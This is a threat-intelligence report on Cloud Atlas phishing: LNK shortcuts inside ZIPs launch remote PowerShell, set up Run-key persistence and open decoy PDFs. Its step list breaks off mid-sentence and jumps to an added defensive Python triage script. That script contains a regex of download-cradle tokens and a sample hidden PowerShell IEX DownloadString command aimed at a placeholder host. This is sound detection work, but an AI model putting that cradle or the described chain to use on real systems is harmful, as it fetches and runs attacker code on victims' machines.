Intel Node
Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
Cloud Atlas attacks the public sector and diplomatic structures of Russia and Belarus, using ReverseSocks, SSH, and Tor for persistence in infected systems and its new tool, PowerCloud.
In 2025, we observed pervasive SSH tunnel activity, which has remained active into 2026, affecting many government organizations and commercial companies in Russia and Belarus. Behind some of this activity is Cloud Atlas, a group we have known since 2014. During our investigation, we identified new tools used by this group, as well as indicators of compromise. The group is back to sending out archives containing malicious shortcuts that launch PowerShell scripts.
This technique is employed in addition to the previously described use of malicious documents, which exploit an old vulnerability in the Microsoft Office Equation Editor process (CVE-2018-0802) to download and execute malicious code. We have observed the use of third-party public utilities (Tor/SSH/RevSocks) to gain a foothold in infected systems and create additional backup control channels.

Technical details

Initial infection

As for the primary compromise, Cloud Atlas remains consistent in using phishing. In the observed campaigns, the attackers emailed a ZIP archive containing an LNK file as an attachment.
Malware execution flow

Attackers use LNK shortcuts to covertly execute PowerShell scripts hosted on external resources.

[Image: the command line of the shortcut]

[Image: example of the PowerShell script downloaded and executed by the shortcut]

Actions performed by the downloaded PowerShell script:

1. Drops “$temp\fixed.ps1”. Pre-staging: places the main payload locally in advance, so that it can still be executed if network connectivity or the C2 server is unavailable later.
2. Creates the registry value “YandexBrowser_setup” under the “Run” key, pointing at “$temp\fixed.ps1”. Early persistence: guarantees execution at the next logon or reboot, so the payload still activates automatically even if the script is interrupted during the later stages.
3. Downloads and drops “$temp\rar.zip”. Payload delivery: retrieves the decoy archive from the remote server to prepare user-facing content for the distraction phase.
4. Extracts “*.pdf” from the downloaded “$temp\rar.zip”. Decoy preparation: unpacks the legitimate-looking document so it can be opened silently, without requiring user interaction.
5. Opens the extracted decoy document “*.pdf” with the user’s default software. User distraction: a convincing document keeps the user engaged and gives the appearance of a legitimate workflow, buying an additional 30–120 seconds for the background operations.
6. Executes “taskkill.exe /F /Im winrar.exe”. Process concealment: terminates the archive extractor so the user does not see the archive contents or notice the unexpected file extraction.
7. Searches for and deletes “rar.zip”, “*.pdf.zip” and “*.pdf.
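The delivery chain described above (a ZIP attachment carrying an LNK whose command line fetches and runs a PowerShell script, followed by a Run value that relaunches a .ps1 from the temp folder) can be triaged offline before anything is opened. The Python script below is an added example written for this page; it is not Cloud Atlas tooling and not code from the original report. It parses the StringData of a .lnk (target path, arguments, ShowCommand) straight out of a ZIP held in memory, flags download-cradle and evasion tokens in the PowerShell command line, and checks a Run-key value against the temp-folder script pattern. The LNK bytes, the ZIP, the command line with its example.invalid URL and the registry value data are all constructed for the demonstration; the LNK builder exists only to produce that test input.

```python
"""Offline triage of a phishing ZIP -> LNK -> PowerShell download-cradle chain.

Added example for this page; not Cloud Atlas tooling and not code from the original
report. The LNK, the ZIP, the command line and the registry value are constructed."""
import io
import re
import struct
import zipfile

# ShellLinkHeader.LinkFlags bits (MS-SHLLINK 2.1.1) needed to reach StringData
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value LNK droppers use to keep the console window off screen

# Tokens that turn a PowerShell command line into a download cradle or hide it from the user
CRADLE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
                    r"invoke-expression|frombase64string|-enc(odedcommand)?\b|"
                    r"-w(indowstyle)? +hidden|-nop\b|-e(xecutionpolicy|p)? +bypass)")


def build_lnk(relative_path, arguments, name="", show_command=1):
    """Write a minimal, spec-valid .lnk (76-byte header + StringData). Constructed test input only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_NAME if name else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x80)  # FILE_ATTRIBUTE_NORMAL
    header += b"\x00" * 24  # CreationTime, AccessTime, WriteTime (FILETIME, zero = unset)
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, HotKey, reserved

    def string_data(s):  # CountCharacters (UTF-16 code units) followed by the characters, no terminator
        enc = s.encode("utf-16-le")
        return struct.pack("<H", len(enc) // 2) + enc
    return header + (string_data(name) if name else b"") + string_data(relative_path) + string_data(arguments)


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a .lnk, skipping IDList and LinkInfo if present."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + item list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize is the first field of LinkInfo
        off += struct.unpack_from("<I", data, off)[0]
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        fields[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        off += count * width
    return fields


def triage_lnk(fields):
    """List the reasons a parsed LNK looks like a PowerShell cradle; an empty list means nothing fired."""
    cmd = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    reasons = []
    if re.search(r"(?i)\b(powershell|pwsh)(\.exe)?\b", cmd):
        reasons.append("target is PowerShell")
    reasons += ["cradle/evasion token: " + m.group(0) for m in CRADLE.finditer(cmd)]
    if re.search(r"(?i)https?://", cmd):
        reasons.append("remote URL in shortcut command line")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    return reasons


def scan_zip(zip_bytes):
    """Triage every .lnk inside an attachment ZIP in memory, without extracting anything to disk."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {i.filename: triage_lnk(parse_lnk(zf.read(i)))
                for i in zf.infolist() if i.filename.lower().endswith(".lnk")}


def suspicious_run_value(value_data):
    """True when a Run-key value starts a script interpreter on a file under the temp folder."""
    d = value_data.lower()
    return bool(re.search(r"powershell|pwsh|wscript|cscript|mshta", d)
                and re.search(r"%temp%|\\temp\\|\\appdata\\local\\temp", d)
                and re.search(r"\.(ps1|vbs|js|hta)\b", d))


# Constructed sample mimicking the described delivery (example.invalid is a reserved, non-resolving domain)
SAMPLE_ARGS = ("-w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('https://example.invalid/upd')\"")
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       SAMPLE_ARGS, name="Invitation.pdf", show_command=SW_SHOWMINNOACTIVE)
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("Invitation.pdf.lnk", SAMPLE_LNK)
    _zf.writestr("readme.txt", "constructed benign file")
SAMPLE_ZIP = _buf.getvalue()

if __name__ == "__main__":
    for fname, reasons in scan_zip(SAMPLE_ZIP).items():
        print(fname, "->", reasons or "no indicators")
    print(suspicious_run_value(r"powershell -ep bypass -f C:\Users\u\AppData\Local\Temp\fixed.ps1"))
```

The parser deliberately stops at StringData: the target path and arguments are what the shell hands to CreateProcess, so they are the fields worth reading before a user double-clicks, and skipping the optional IDList and LinkInfo blocks by their size fields keeps the same code working on shortcuts that carry them. On a live host the Run-key check would be fed from HKCU\Software\Microsoft\Windows\CurrentVersion\Run, with a hit on a script under %TEMP% worth pairing with a look for leftover files such as a .ps1 or archive remnants in that folder.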